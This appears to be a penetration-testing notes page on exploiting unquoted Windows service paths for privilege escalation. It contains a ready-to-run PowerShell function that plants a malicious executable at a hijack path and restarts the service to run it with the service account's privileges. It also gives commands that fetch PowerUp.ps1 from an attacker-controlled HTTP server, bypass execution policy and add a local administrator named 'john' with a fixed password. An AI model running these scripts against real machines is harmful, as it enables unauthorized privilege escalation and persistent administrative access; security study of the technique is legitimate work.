Unquoted Service Paths
This attack relies on the way Windows resolves an executable path that is unquoted and contains spaces: it has to guess where the file name ends.
Introduction
When a service starts, the Service Control Manager launches its binary with the CreateProcess
function. The function accepts the executable either through lpApplicationName (an exact path) or, when lpApplicationName is NULL, as the first token of lpCommandLine; services are started the second way, with the ImagePath value passed as the command line.
If that path is unquoted and contains spaces, CreateProcess cannot tell where the executable name ends and the arguments begin, so it tries each space-delimited prefix in turn, appending .exe, until one of them exists.
For example, the path C:\Program Files\program folder\binary.exe
will be tried in the following order:
C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe
If an attacker can create a file in C:\ or C:\Program Files\, the planted executable is found first and runs under the service account (often LocalSystem).
Enumeration
Searching for vulnerable services:
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Checking whether you can create files in the directories where a spoofed executable would be picked up (for example C:\ or C:\Program Files\), looking for your user, Users, Authenticated Users, or Everyone with W, M, or F rights:
icacls "<path>"
The table below describes the permission abbreviations in icacls
output:
F: Full access
M: Modify access
RX: Read and execute access
R: Read-only access
W: Write-only access
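The following PowerShell script is an added example, not part of the original page: it combines the two enumeration steps above. For every service whose PathName is unquoted and contains a space, it expands the candidate paths CreateProcess tries before the real binary (the general form of the C:\Program.exe, C:\Program Files\program.exe example) and probes whether the current user can create a file in each candidate's directory. The function names are my own; the write check works by creating and deleting a temporary file, which is what icacls output is used to predict.

```powershell
# Added example (not from the original page). Expand the prefixes that
# CreateProcess tries for an unquoted service path, then test where the
# current user could plant a file.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)

    # Drop any arguments: keep everything up to and including the first ".exe"
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if (-not $m.Success) { return @() }
    $exe = $m.Groups[1].Value

    # Each space-delimited prefix plus ".exe" is tried before the real binary
    $candidates = @()
    $parts = $exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-WriteAccess {
    param([Parameter(Mandatory)][string]$Directory)

    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    # Probe with a throw-away file; icacls tells you the ACL, this tells you the result
    $probe = Join-Path $Directory ('.' + [guid]::NewGuid().ToString('N'))
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

# Unquoted, outside C:\Windows, and with a space inside the executable part
Get-CimInstance -ClassName Win32_Service |
    Where-Object {
        $_.PathName -and
        $_.PathName -notmatch '^"' -and
        $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
        ($_.PathName -replace '^(.*?\.exe).*$', '$1') -match ' '
    } |
    ForEach-Object {
        $svc = $_
        foreach ($cand in Get-UnquotedPathCandidates -PathName $svc.PathName) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode      # Auto services can be retriggered by a reboot
                Candidate = $cand
                Writable  = Test-WriteAccess -Directory (Split-Path -Parent $cand)
            }
        }
    } | Format-Table -AutoSize
```

Rows with Writable set to True are the ones worth exploiting; the StartMode column tells you whether a reboot will restart the service if you lack the right to restart it yourself.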
Exploit
The process is pretty similar to Service Binary Hijacking: place a malicious executable at one of the earlier candidate paths (for example C:\Program Files\program.exe) and restart the service. If you cannot stop and start the service, a service with an Auto start mode will pick up the planted binary on the next reboot.
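As an added example of the manual route (not code from the original page), the function below plants an attacker-supplied executable at a chosen candidate path, checks that the path really is a space-truncated prefix of the service's unquoted ImagePath, and then tries to restart the service, falling back to a reboot hint when the caller lacks restart rights. The function name and the parameters ServiceName, HijackPath and Payload are assumptions for this illustration.

```powershell
# Added example (not from the original page). Manual exploitation of an
# unquoted service path once a writable candidate location is known.

function Invoke-UnquotedPathHijack {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$HijackPath,   # e.g. 'C:\Program Files\program.exe'
        [Parameter(Mandatory)][string]$Payload       # your malicious executable
    )

    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "Service $ServiceName not found" }

    # The hijack path only works if CreateProcess will try it: the ImagePath
    # must be unquoted and start with "<hijack path without .exe> "
    $prefix = $HijackPath -replace '\.exe$', ''
    if ($svc.PathName.StartsWith('"') -or
        -not $svc.PathName.StartsWith("$prefix ", 'OrdinalIgnoreCase')) {
        throw "$HijackPath is not a candidate for '$($svc.PathName)'"
    }

    Copy-Item -LiteralPath $Payload -Destination $HijackPath -ErrorAction Stop
    Write-Host "[+] Planted $HijackPath"

    try {
        Restart-Service -Name $ServiceName -ErrorAction Stop
        Write-Host "[+] Service restarted, payload executed as the service account"
    } catch {
        # Without SERVICE_STOP / SERVICE_START on the service, the only way to
        # re-launch it is a reboot, which requires SeShutdownPrivilege
        Write-Warning "Cannot restart ${ServiceName}: $($_.Exception.Message)"
        if ($svc.StartMode -eq 'Auto') {
            Write-Warning "Start mode is Auto: a reboot (shutdown /r /t 0) will run the payload"
        } else {
            Write-Warning "Start mode is $($svc.StartMode): the payload runs when the service is next started"
        }
    }
}

# Usage (assumed service name and payload):
# Invoke-UnquotedPathHijack -ServiceName '<service_name>' -HijackPath 'C:\Program Files\program.exe' -Payload .\payload.exe
# Get-LocalUser john   # verify, if the payload adds a user
```

A payload that does not register with the Service Control Manager is killed after the start timeout and the service reports error 1053, but the commands in the payload have already run by then; remove the planted file afterwards so the legitimate service can start again.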
Automated Process
It is possible to automate the process with the well-known PowerUp script
from PowerSploit.
Collection:
Downloading PowerUp.ps1:
iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1
Bypassing the execution policy:
powershell -ep bypass
Importing PowerUp.ps1:
. .\PowerUp.ps1
Enumerate services with unquoted paths:
Get-UnquotedService
Exploiting by writing a malicious binary to one of the candidate paths, for example C:\Program Files\program.exe (the default behaviour is to create a new local user called john with the password Password123! and add it to the local Administrators group):
Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"
Triggering the exploit by restarting the service (or rebooting if the service starts automatically and you cannot restart it):
Restart-Service <service_name>